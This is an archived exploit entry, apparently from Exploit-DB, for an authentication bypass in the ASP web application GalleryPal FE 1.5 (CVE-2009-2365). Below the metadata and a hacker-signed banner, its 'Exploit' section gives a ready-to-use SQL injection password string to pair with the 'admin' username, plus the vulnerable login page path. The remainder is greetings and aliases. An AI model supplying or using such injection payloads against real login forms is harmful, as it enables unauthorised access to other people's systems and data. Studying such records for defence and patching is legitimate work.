GalleryPal FE 1.5 - Authentication Bypass

Author: R3d-D3V!L
type: webapps
platform: asp
port: 
date_added: 2009-12-14  
date_updated:   
verified: 0  
codes: CVE-2009-2365;OSVDB-55471  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 10464.txt  

------------------------------------------------------------
[~] GalleryPal FE v1.5(Auth Bypass)

[~]TYPE:Remote SQL Injection Vulnerability

[~] ----------------------------------------------------------

[~] author: R3d-D3v!L

[~]

[~] Date: 15.11.2008

[~]

[~] Home: www.ahacker.net

[~]

[~] contact: N/A

[~]

[~] -----------------------------------------------------------


ALERT FR0M THE DARKNESS BY 7h3 REd-D3v!L

[~] Exploit:



[*] username : admin


[*] password : X' or ' 1=1--

[*] demo:

[*] server/GalleryPal_FE_Demo/login.asp



[~] spechial thanks : ((dolly)) & ((7am3m)) & ((magoush_1987)) & (DEV!L_MODE) & ((0R45hy)) & {0}-{n-c-A}-{0}

[~]

[?] 4.!.S ---> ((R3d D?v!L))--JuPA--M2Z --d3v!L-Ro07

[~]

[~] www.xp10.me

[~]

[~]I4M:4r48!4N-3XPLO!73r